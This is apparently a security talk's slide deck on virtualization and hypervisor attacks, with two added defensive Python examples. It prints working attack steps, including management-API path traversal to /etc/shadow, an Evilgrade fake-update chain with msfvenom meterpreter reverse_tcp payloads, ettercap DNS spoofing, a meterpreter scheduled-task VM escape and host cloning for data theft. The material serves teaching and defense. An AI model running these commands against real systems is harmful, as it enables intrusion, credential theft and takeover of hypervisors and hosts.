# WHO AM I
Senior Security Engineer
Penetration Testing
Incident Response
DISCLAIMERS
This presentation does not encourage people to hack.
(For educational purposes only)
AND
The presentation does not cover all parts of the virtualization technology area.
(It is rearranged from my thesis research literature review)
TOPICS
- Virtualization and hypervisor
- Virtualization threats and issues
- Vulnerability statistics of widely used hypervisors
- Guest VM attack
- Virtualization environment network attack
- Hypervisor attack
- Hypervisor management and API attack
- Host attack from VM
- Docker breakout by shocker
- Use virtualization as attack tool
- Security for virtualization
Virtualization
VIRTUALIZATION
[Diagrams: cloud services (Cloud, google, iCloud); management clients (vSphere Client, vCenter, XenCenter, Virt-manager)]
Hypervisor
HYPERVISOR
[Diagrams: a Hypervisor hosting many VMs; VMware Workstation]
HYPERVISOR VS DOCKER (application containers)
Virtualization Threats
Vulnerability Statistic
CVE-DETAIL (cvedetails.com)
[Chart: vulnerability counts per hypervisor product, cvedetails.com]
[Chart: Bare-metal Hypervisor vulnerability per year, 2008 to 2015, by type: DoS, Gain Privileges, Overflow, Code Execution, Gain Information, Memory Corruption, Bypass something, Directory Traversal, XSS]
[Pie chart: Bare-metal Hypervisor vulnerability 2008-2015 by type, cvedetails.com; shares shown: 52%, 15%, 12%, 7%, 6.5%, 4.5%, 2%, 1%, 0.5%]
IS THE VIRTUALIZATION THREAT DIFFERENT FROM THE TRADITIONAL ENVIRONMENT?
Traditional stack
- Application : Web, Web Service, Mail, FTP, DB
- Operating System : Linux, Windows, Solaris
- Hardware : CPU, Memory, Storage, NIC, Network
Attacks : XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, ARP Poisoning
Virtualization stack
- Application : Web, Web Service, Mail, FTP, DB
- Operating System : Linux, Windows, Solaris
- Hypervisor components : Kernel, Lib, API, Network (additional attack surface)
- Hardware : CPU, Memory, Storage, NIC, Network
Attacks : the same list as above, plus the hypervisor components as an additional attack surface
GENERAL SECURITY ISSUES FOR VIRTUALIZATION
- Information leakage
- Unauthorized access, intentionally or unintentionally, by users or administrators
- Data remaining in storage
- Data ownership
- Data migration at end of service
- Multi-tenancy
- Shared resources
- Use of a VM to commit fraud or crime
- Laws and regulations
VIRTUALIZATION TECHNICAL SECURITY ISSUES
GUEST VM ATTACK
- Traditional attacks according to services
- Guest VM attacks other guest VMs (same network segment)
- Guest VM attacks other guest VMs on the same hypervisor (VM hyper jumping)
- Cross-VM attack (side channel attack)
- Guest stealing
- Guest copy
TRADITIONAL ATTACK
[Diagram: Hypervisor with Guest VM1 and Guest VM2]
VM ATTACKS OTHER VM
[Diagram: Hypervisor with Guest VM1 and Guest VM2]
VM HYPER JUMPING
[Diagram: Hypervisor with Guest VM1 and Guest VM2]
CROSS-VM ATTACK (SIDE CHANNEL)
[Diagram: Hypervisor with Guest VM1 and Guest VM2; channel: time or computational power]
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
[Diagram: request through the Hypervisor's Management API reaches the VM file]
GUEST STEALING : VASTO
[Screenshots]
GUEST COPY
Copy them (Authorized or Unauthorized):
- Passwords
- OS
- Mail
- Cookies
- Browser history
- Sensitive data
- Databases
- Configurations
- Source codes
- Software licenses
- Many more...
IF ( VM == win7 or XP )
IF ( VM == 2008 or 2012 )
How about the password? Ans: Reset it !!!
IF ( VM == 2008 or 2012 )
- Insert CD to make a tricky password reset via the repair option
- Copy cmd.exe to be Utilman.exe and reboot
- Press Windows Key + U
- Bravo !!!
- ps : http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
- Or add another account as administrator and hashdump, and crack it by JTR
IF ( VM == Unix ) THEN single_mode();
Forensic tools to access data : VMDK, Snapshot
NETWORK ATTACK
- Traditional attacks according to services
- vSwitch attack
- Sniffing
- Scanning
- MitM
OPEN VSWITCH CVE-2012-3449 : INSECURE DIRECTORY PERMISSIONS VULNERABILITY, CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2
- vSwitch Attack
- SNIFF : not much sensitive data in a modern VM/Hypervisor
- SCAN
MANAGEMENT API ATTACK
- Directory Traversal
- Brute Force Attack : auxiliary/scanner/vmware/vmware_http_login, Burp Suite Intruder
- Response Splitting
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
VMware ESXi 3.5 or earlier fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information from the host operating system.
https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
[Diagram: request to the Hypervisor's Management API reaches a system file]
ESX root password : crack it with JTR !!!
BRUTE FORCE ATTACK by Metasploit VMware auxiliary modules
BRUTE FORCE ATTACK by Burp Suite Intruder
NO-CVE : HTTP RESPONSE SPLITTING
MANAGEMENT ENVIRONMENT ATTACK
- Hooking
- MiTM
- Fake update
Tools : vmware-vilurker, Evilgrade
HOOKING
MITM
[Diagram: Attacker between Management Software and Hypervisor]
MITM : Which picture shows we are under a MiTM attack ??? We never know !!!!
MITM : vSphere Client
MITM : XenCenter
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
[Diagram: Admin and ESXi reach softwareupdate.vmware.com over the Internet; the attacker inserts via ARP spoofing / rogue DNS]
FAKE MANAGEMENT SOFTWARE UPDATE by vmware_vilurker
Credit: Watcharaphon Wongaphai
[Screenshots]
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
- create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/)
- create handler, wait for reverse connection
- add domain upgrade version into /etc/ettercap/etter.dns
- ettercap -tqm arp:remote /victim/ /dnsserver real/ -> press p, select dns_spoof
- run evilgrade
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
root@localhost:~# msfvenom p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 f exe > /opt/agemt.exe
root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo softwareupdate.vmware.comA 10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //
press p
root@localhost:~# dns_spoof
root@localhost:~# msfconsole
msf>use exploit multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 10.10.10.74
msf>set LPORT 8080
msf> exploit
root@localhost :~# evilgrade
evilgrade >config vmware
evilgrade >start
FAKE MANAGEMENT SOFTWARE UPDATE : Result
[Screenshots]
[Diagram: Admin and ESXi fetch the update from softwareupdate.vmware.com over the Internet, redirected by ARP spoofing / rogue DNS]
HYPERVISOR ATTACK
- Compromised hypervisor (hyper-jacking) : take full control, run a rogue hypervisor on top of an existing hypervisor, install hypervisor rootkits
- Denial of service (the hypervisor is a great single point of failure)
- HyperCall hooking/attack
- DENIAL OF SERVICE : PSOD
- HYPER CALL HOOKING ATTACK : Xen i386, paravirtualization
EXAMPLES : CVE-2013-4553 : XEN DOMCTL_GETMEMLIST HYPERCALL IN XEN 3.4.X THROUGH 4.3.X ; CVE-2012-3495 : XEN HYPERCALL PHYSDEV_GET_FREE_PIRQ
BUFFER OVERFLOW, DENIAL OF SERVICE, EXPLOIT CODE TO EXECUTE IN PRIVILEGE
- HYPER CALL HOOKING/ATTACK
CVE-2014-4947 AND CVE-2014-4948 : LOCAL USERS CAN DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
CVSS v2 Base Score: 10.0 (High). Citrix XenServer 6.2 SP1 and prior versions: a local user on the guest system can trigger a buffer overflow in HVM (Hardware Virtual Machine) graphics console support.
An exploit on the guest system can cause denial of service conditions and obtain potentially sensitive information.
[Diagram sequence: Hypervisor with HVM Graphic Console serving three Guest VMs; a guest sends AAAAAAAAAAAAAAAAAAAA...AAAAA into the console, then AAAAAAAAAAAAAAAA x00 x00 x00, overwriting hypervisor Resources]
CVE-2015-3456 : VENOM (Virtualized Environment Neglected Operations Manipulation)
Discovered by Jason Geffner, CrowdStrike senior security researcher. The bug (buffer overflow) is in QEMU's virtual floppy disk controller (FDC). This vulnerable FDC code is used in numerous virtualization platforms and appliances, notably Xen, KVM, VirtualBox, and the native QEMU client.
An attacker needs administrative or root privileges in the guest operating system in order to exploit VENOM.
The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp
Exploit the buffer overflow within the FDC to break out of the VM:
- Can access other VMs within that hypervisor
- Can jump to other VMs in other hypervisors
- Can access the underlying bare-metal system's hardware and use that to see other systems on the hypervisor's network
HOST ATTACK : VM ESCAPE
[Diagram: VM on Hypervisor reaching Host Resources]
HOST ATTACK
- USING PATH TRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICIENT INPUT VALIDATION
VM ESCAPE
0xc2 0x2e 0xc2 0x2e   0x2e 0x2e   ..
../../../../../../boot.ini
Modify VMFtp's source code to replace all occurrences of '+' with '\xc2' in an input pathname
OR
- Modify the task schedule as a new job to run metX.exe and put it back to /windows/tasks
- Put the created task onto the host
- Generate meterpreter
- Run handler and wait until time to run the task
- And compromised
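Added example, not from the deck: a defender-side request-path check that catches the traversal forms shown in the CVE-2009-3733 management-API slides and in the CVE-2008-0923 shared-folders escape, including the overlong 0xC2 0x2E spelling of '.' that a literal '..' filter misses. The sample paths are constructed, and the decoding of 0xC2 0x2E as a dot is the behaviour the slides describe, not a claim about any particular product's parser.

```python
from urllib.parse import unquote

# Constructed sample paths (not from the original deck). Raw bytes should be
# decoded as latin-1 before this check so that byte 0xC2 becomes '\xc2'.
SAMPLES = {
    "benign":   "/sdk/vimService.wsdl",
    "raw":      "/sdk/../../../../../../etc/shadow",
    "encoded":  "/sdk/%2e%2e/%2e%2e/%2e%2e/etc/shadow",
    # shared-folder style path: each '.' written as 0xC2 0x2E
    "overlong": "docs\\\xc2.\xc2.\\\xc2.\xc2.\\\xc2.\xc2.\\boot.ini",
}

def naive_filter(path: str) -> bool:
    """The check the slides show being bypassed: look for a literal '..'."""
    return ".." in path

def normalize(path: str) -> str:
    """Undo the encodings used to hide '..': percent-encoding (applied twice
    to cover double encoding), the overlong 0xC2 0x2E form of '.', and
    backslash separators."""
    p = unquote(unquote(path))
    p = p.replace("\xc2.", ".")
    return p.replace("\\", "/")

def escapes_base(path: str) -> int:
    """Count how many times the normalized path climbs above the directory
    the request is relative to; anything > 0 is a traversal attempt."""
    depth = escapes = 0
    for seg in normalize(path).split("/"):
        if seg == "..":
            if depth == 0:
                escapes += 1
            else:
                depth -= 1
        elif seg not in ("", "."):
            depth += 1
    return escapes

def is_traversal(path: str) -> bool:
    return escapes_base(path) > 0

if __name__ == "__main__":
    for name, path in SAMPLES.items():
        print(f"{name:9} naive={naive_filter(path)!s:5} "
              f"normalized={is_traversal(path)!s:5} escapes={escapes_base(path)}")
```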
CVE-2012-0217 : Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64-bit CPUs
Some 64-bit operating systems and virtualization software programs are vulnerable to local privilege escalation attacks when running on Intel processors (CPUs), because of how Intel implemented the SYSRET instruction in its x86-64 extension. Attackers could exploit the vulnerability to force Intel CPUs to return a general protection fault in privileged mode.
Affected: Windows 7 and Windows Server 2008 R2, the 64-bit versions of FreeBSD and NetBSD, the Xen virtualization software, as well as Red Hat Enterprise Linux and SUSE Linux Enterprise Server, which include the Xen hypervisor by default.
Architecture vulnerability.
MALICIOUS SCRIPT IN HYPERVISOR : ROP
ROP the Xen Hypervisor utilizing Return-oriented Programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged or not, and thus can escalate the privilege of an unprivileged domain (DomU).
[Diagrams: ROP chain; make buffer overflow]
Unfortunately, this technique needs a lot of factors to make it possible in today's hypervisors
FUZZING
USE VIRTUALIZATION AS ATTACK TOOL
- Host Stealing (P2V host cloning) with VMware vCenter Converter Standalone
[Screenshots: source 10.200.1.10 (Administrator, password) -> destination 10.200.1.100 (root, password)]
- Compromised host : get root/admin password
- Victim 10.200.1.10 -> ESX / VMware Workstation on hacker machine 10.200.1.100
- Wait until finish
- Don't forget to dump RAM too!!! P2V doesn't copy the current data in RAM from the victim server (volatility, Meterpreter, pmdump)
- Finish ... and completely PWN. Have more time to get:
  - DB connection strings
  - Server configurations
  - Source code
  - Crack more passwords
  - Dig more sensitive files
But.. Nothing is easy in real life
DOCKER BREAKOUT BY DOCKER SHOCKER
https://github.com/gabrtv/shocker
[Screenshots: shocker run]
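Added defensive example, not part of the deck or of the shocker project: the shocker breakout depends on the container holding CAP_DAC_READ_SEARCH (it calls open_by_handle_at against the host filesystem), which early Docker releases granted by default and later releases dropped from the default set, so today it arrives only through --cap-add or --privileged. This audit reads `docker inspect`-style JSON (HostConfig.Privileged and HostConfig.CapAdd are the real field names; the sample records are constructed) and flags containers that reopen that door.

```python
import json

# Capabilities that let a container process reach outside its mount namespace
# or the host kernel. CAP_DAC_READ_SEARCH is the one the shocker breakout used.
RISKY_CAPS = {"DAC_READ_SEARCH", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE"}

# Constructed sample in the shape of `docker inspect` output; not taken from any real host.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web",    "HostConfig": {"Privileged": False, "CapAdd": None}},
    {"Name": "/backup", "HostConfig": {"Privileged": False, "CapAdd": ["CAP_DAC_READ_SEARCH"]}},
    {"Name": "/debug",  "HostConfig": {"Privileged": True,  "CapAdd": None}},
])

def audit_containers(inspect_json: str) -> dict:
    """Return {container name: [findings]} for containers whose HostConfig
    runs privileged or adds a capability in RISKY_CAPS (or ALL)."""
    findings = {}
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig") or {}
        problems = []
        if hc.get("Privileged"):
            problems.append("privileged: all capabilities and host devices")
        for cap in hc.get("CapAdd") or []:
            name = cap.upper()
            if name.startswith("CAP_"):      # docker accepts both spellings
                name = name[4:]
            if name == "ALL" or name in RISKY_CAPS:
                problems.append(f"CapAdd grants {name}")
        if problems:
            findings[c["Name"]] = problems
    return findings

if __name__ == "__main__":
    for name, probs in audit_containers(SAMPLE_INSPECT).items():
        print(name, "->", "; ".join(probs))
```

Feed it the real output of `docker inspect $(docker ps -q)` to check a running host.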
Security for Virtualization
SECURITY FOR VIRTUALIZATION
- Contract, law and regulation
- System segmentation : VLAN / SDN
- Dedicated management network
- Dedicated storage networks
- Protect all virtual system files (Snapshot, VHDD, Configuration)
- Update patches
- System hardening
- Implement security monitoring and detection tools
- Security assessment !!!!
- BCP / DRP
CONCLUSION
- Traditional attack methods can be used to attack virtualization technology
- Virtualization technology has more attack surfaces
- The hypervisor is considered a single point of failure
- Secure by design, security protection and hardening are important for virtualization technology